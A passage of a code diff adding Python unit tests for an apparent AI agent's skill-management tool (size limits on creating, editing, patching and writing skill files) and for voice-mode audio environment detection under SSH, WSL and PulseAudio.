+        content = frontmatter + ("x" * body_budget)
+        assert len(content) == MAX_SKILL_CONTENT_CHARS
+        result = json.loads(skill_manage(action="create", name="edge-skill", content=content))
+        assert result["success"] is True
+
+
+class TestEditSkillSizeLimit:
+    """edit action rejects oversized content."""
+
+    def test_edit_over_limit(self, isolate_skills):
+        # Create a small skill first
+        small = _make_skill_content(1000)
+        json.loads(skill_manage(action="create", name="grow-me", content=small))
+
+        # Try to edit it to be oversized
+        big = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 100)
+        # Fix the name in frontmatter
+        big = big.replace("name: test-skill", "name: grow-me")
+        result = json.loads(skill_manage(action="edit", name="grow-me", content=big))
+        assert result["success"] is False
+        assert "100,000" in result["error"]
+
+
+class TestPatchSkillSizeLimit:
+    """patch action checks resulting size, not just the new_string."""
+
+    def test_patch_that_would_exceed_limit(self, isolate_skills):
+        # Create a skill near the limit
+        near_limit = _make_skill_content(MAX_SKILL_CONTENT_CHARS - 50)
+        json.loads(skill_manage(action="create", name="near-limit", content=near_limit))
+
+        # Patch that adds enough to go over
+        result = json.loads(skill_manage(
+            action="patch",
+            name="near-limit",
+            old_string="# Test Skill",
+            new_string="# Test Skill\n" + ("y" * 200),
+        ))
+        assert result["success"] is False
+        assert "100,000" in result["error"]
+
+    def test_patch_that_reduces_size_on_oversized_skill(self, isolate_skills, tmp_path):
+        """Patches that shrink an already-oversized skill should succeed."""
+        # Manually create an oversized skill (simulating hand-placed)
+        skill_dir = tmp_path / "skills" / "bloated"
+        skill_dir.mkdir(parents=True)
+        oversized = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 5000)
+        oversized = oversized.replace("name: test-skill", "name: bloated")
+        (skill_dir / "SKILL.md").write_text(oversized, encoding="utf-8")
+        assert len(oversized) > MAX_SKILL_CONTENT_CHARS
+
+        # Patch that removes content to bring it under the limit.
+        # Use replace_all to replace the repeated x's with a shorter string.
+        result = json.loads(skill_manage(
+            action="patch",
+            name="bloated",
+            old_string="x" * 100,
+            new_string="y",
+            replace_all=True,
+        ))
+        # Should succeed because the result is well within limits
+        assert result["success"] is True
+
+    def test_patch_supporting_file_size_limit(self, isolate_skills):
+        """Patch on a supporting file also checks size."""
+        small = _make_skill_content(1000)
+        json.loads(skill_manage(action="create", name="with-ref", content=small))
+        # Create a supporting file
+        json.loads(skill_manage(
+            action="write_file",
+            name="with-ref",
+            file_path="references/data.md",
+            file_content="# Data\n\nSmall content.",
+        ))
+        # Try to patch it to be oversized
+        result = json.loads(skill_manage(
+            action="patch",
+            name="with-ref",
+            old_string="Small content.",
+            new_string="x" * (MAX_SKILL_CONTENT_CHARS + 100),
+            file_path="references/data.md",
+        ))
+        assert result["success"] is False
+        assert "references/data.md" in result["error"]
+
+
+class TestWriteFileSizeLimit:
+    """write_file action enforces both char and byte limits."""
+
+    def test_write_file_over_char_limit(self, isolate_skills):
+        small = _make_skill_content(1000)
+        json.loads(skill_manage(action="create", name="file-test", content=small))
+
+        result = json.loads(skill_manage(
+            action="write_file",
+            name="file-test",
+            file_path="references/huge.md",
+            file_content="x" * (MAX_SKILL_CONTENT_CHARS + 1),
+        ))
+        assert result["success"] is False
+        assert "100,000" in result["error"]
+
+    def test_write_file_within_limit(self, isolate_skills):
+        small = _make_skill_content(1000)
+        json.loads(skill_manage(action="create", name="file-ok", content=small))
+
+        result = json.loads(skill_manage(
+            action="write_file",
+            name="file-ok",
+            file_path="references/normal.md",
+            file_content="# Normal\n\n" + ("x" * 5000),
+        ))
+        assert result["success"] is True
+
+
+class TestHandPlacedSkillsNoLimit:
+    """Skills dropped directly on disk are not constrained."""
+
+    def test_oversized_handplaced_skill_loads(self, isolate_skills, tmp_path):
+        """A hand-placed 200k skill can still be read via skill_view."""
+        from tools.skills_tool import skill_view
+
+        skill_dir = tmp_path / "skills" / "manual-giant"
+        skill_dir.mkdir(parents=True)
+        huge = _make_skill_content(200_000)
+        huge = huge.replace("name: test-skill", "name: manual-giant")
+        (skill_dir / "SKILL.md").write_text(huge, encoding="utf-8")
+
+        result = json.loads(skill_view("manual-giant"))
+        assert "content" in result
+        # The full content is returned — no truncation at the storage layer
+        assert len(result["content"]) > MAX_SKILL_CONTENT_CHARS
--- a/tests/tools/test_transcription.py
+++ b/tests/tools/test_transcription.py
@@ -18,6 +18,11 @@ import pytest
 # ---------------------------------------------------------------------------


+@pytest.fixture(autouse=True)
+def _clear_openai_env(monkeypatch):
+    monkeypatch.delenv("OPENAI_API_KEY", raising=False)
+
+
 class TestGetProvider:
    """_get_provider() picks the right backend based on config + availability."""

--- a/tests/tools/test_voice_mode.py
+++ b/tests/tools/test_voice_mode.py
@@ -56,6 +56,134 @@ def mock_sd(monkeypatch):
    return mock


+# ============================================================================
+# detect_audio_environment — WSL / SSH / Docker detection
+# ============================================================================
+
+class TestDetectAudioEnvironment:
+    def test_clean_environment_is_available(self, monkeypatch):
+        """No SSH, Docker, or WSL — should be available."""
+        monkeypatch.delenv("SSH_CLIENT", raising=False)
+        monkeypatch.delenv("SSH_TTY", raising=False)
+        monkeypatch.delenv("SSH_CONNECTION", raising=False)
+        monkeypatch.setattr("tools.voice_mode._import_audio",
+                            lambda: (MagicMock(), MagicMock()))
+
+        from tools.voice_mode import detect_audio_environment
+        result = detect_audio_environment()
+        assert result["available"] is True
+        assert result["warnings"] == []
+
+    def test_ssh_blocks_voice(self, monkeypatch):
+        """SSH environment should block voice mode."""
+        monkeypatch.setenv("SSH_CLIENT", "1.2.3.4 54321 22")
+        monkeypatch.setattr("tools.voice_mode._import_audio",
+                            lambda: (MagicMock(), MagicMock()))
+
+        from tools.voice_mode import detect_audio_environment
+        result = detect_audio_environment()
+        assert result["available"] is False
+        assert any("SSH" in w for w in result["warnings"])
+
+    def test_wsl_without_pulse_blocks_voice(self, monkeypatch, tmp_path):
+        """WSL without PULSE_SERVER should block voice mode."""
+        monkeypatch.delenv("SSH_CLIENT", raising=False)
+        monkeypatch.delenv("SSH_TTY", raising=False)
+        monkeypatch.delenv("SSH_CONNECTION", raising=False)
+        monkeypatch.delenv("PULSE_SERVER", raising=False)
+        monkeypatch.setattr("tools.voice_mode._import_audio",
+                            lambda: (MagicMock(), MagicMock()))
+
+        proc_version = tmp_path / "proc_version"
+        proc_version.write_text("Linux 5.15.0-microsoft-standard-WSL2")
+
+        _real_open = open
+        def _fake_open(f, *a, **kw):
+            if f == "/proc/version":
+                return _real_open(str(proc_version), *a, **kw)
+            return _real_open(f, *a, **kw)
+
+        with patch("builtins.open", side_effect=_fake_open):
+            from tools.voice_mode import detect_audio_environment
+            result = detect_audio_environment()
+
+        assert result["available"] is False
+        assert any("WSL" in w for w in result["warnings"])
+        assert any("PulseAudio" in w for w in result["warnings"])
+
+    def test_wsl_with_pulse_allows_voice(self, monkeypatch, tmp_path):
+        """WSL with PULSE_SERVER set should NOT block voice mode."""
+        monkeypatch.delenv("SSH_CLIENT", raising=False)
+        monkeypatch.delenv("SSH_TTY", raising=False)
+        monkeypatch.delenv("SSH_CONNECTION", raising=False)
+        monkeypatch.setenv("PULSE_SERVER", "unix:/mnt/wslg/PulseServer")
+        monkeypatch.setattr("tools.voice_mode._import_audio",
+                            lambda: (MagicMock(), MagicMock()))
+
+        proc_version = tmp_path / "proc_version"
+        proc_version.write_text("Linux 5.15.0-microsoft-standard-WSL2")
+
+        _real_open = open
+        def _fake_open(f, *a, **kw):
+            if f == "/proc/version":
+                return _real_open(str(proc_version), *a, **kw)
+            return _real_open(f, *a, **kw)
+
+        with patch("builtins.open", side_effect=_fake_open):
+            from tools.voice_mode import detect_audio_environment
+            result = detect_audio_environment()
+
+        assert result["available"] is True
+        assert result["warnings"] == []
+        assert any("WSL" in n for n in result.get("notices", []))
+
+    def test_wsl_device_query_fails_with_pulse_continues(self, monkeypatch, tmp_path):
+        """WSL device query failure should not block if PULSE_SERVER is set."""
+        monkeypatch.delenv("SSH_CLIENT", raising=False)
+        monkeypatch.delenv("SSH_TTY", raising=False)
+        monkeypatch.delenv("SSH_CONNECTION", raising=False)
+        monkeypatch.setenv("PULSE_SERVER", "unix:/mnt/wslg/PulseServer")
+
+        mock_sd = MagicMock()
+        mock_sd.query_devices.side_effect = Exception("device query failed")
+        monkeypatch.setattr("tools.voice_mode._import_audio",
+                            lambda: (mock_sd, MagicMock()))
+
+        proc_version = tmp_path / "proc_version"
+        proc_version.write_text("Linux 5.15.0-microsoft-standard-WSL2")
+
+        _real_open = open
+        def _fake_open(f, *a, **kw):
+            if f == "/proc/version":
+                return _real_open(str(proc_version), *a, **kw)
+            return _real_open(f, *a, **kw)
+
+        with patch("builtins.open", side_effect=_fake_open):
+            from tools.voice_mode import detect_audio_environment
+            result = detect_audio_environment()
+
+        assert result["available"] is True
+        assert any("device query failed" in n for n in result.get("notices", []))
+
+    def test_device_query_fails_without_pulse_blocks(self, monkeypatch):
+        """Device query failure without PULSE_SERVER should block."""
+        monkeypatch.delenv("SSH_CLIENT", raising=False)
+        monkeypatch.delenv("SSH_TTY", raising=False)
+        monkeypatch.delenv("SSH_CONNECTION", raising=False)
+        monkeypatch.delenv("PULSE_SERVER", raising=False)
+
+        mock_sd = MagicMock()
+        mock_sd.query_devices.side_effect = Exception("device query failed")
+        monkeypatch.setattr("tools.voice_mode._import_audio",
+                            lambda: (mock_sd, MagicMock()))
+
+        from tools.voice_mode import detect_audio_environment
+        result = detect_audio_environment()
+
+        assert result["available"] is False
+        assert any("PortAudio" in w for w in result["warnings"])
+
+
 # ============================================================================
 # check_voice_requirements
 # ============================================================================